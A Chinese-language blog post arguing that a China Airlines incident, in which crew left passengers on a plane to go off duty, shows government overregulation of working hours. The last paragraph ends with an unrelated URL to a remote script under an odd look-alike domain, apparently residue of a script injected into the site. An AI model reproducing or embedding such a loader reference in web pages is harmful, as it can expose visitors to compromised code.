分類
隨筆

我看華航乘客丟包事件

東森新聞報導:「華航班機故障撤空服員留下整機旅客 民航局:不應該發生

過去我們在「加班的簡易經濟分析 (https://wp.me/p9ffS3-tf)」一文中已經說過:

僱傭契約是一種委任契約的變形,起因來自於現代化分工合作架構下,單一員工的工作產出量度費用高(可能因為產出抽象亦或是內容複雜),因此將「本應與產出掛勾計價」的模式轉為勞資雙方爭議少的「工時計價」上。

然而許多勞工團體、學者甚至立法者往往倒果為因,抓著工時不知變通甚至鑽牛角尖,才會發生如今華航因為工時限制而把乘客丟在飛機上,機組人員自己下班去的荒唐狀況。

這部份本來市場運作很少出問題,但當政府過度干預,且用過度偏重某種量度方式,而忽略勞雇關係本質時,就會發生這種「政府失靈」的現象。同時,我們還會看到很多蠢蛋試圖用更多法規、更多公務員來處理政府失靈。https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s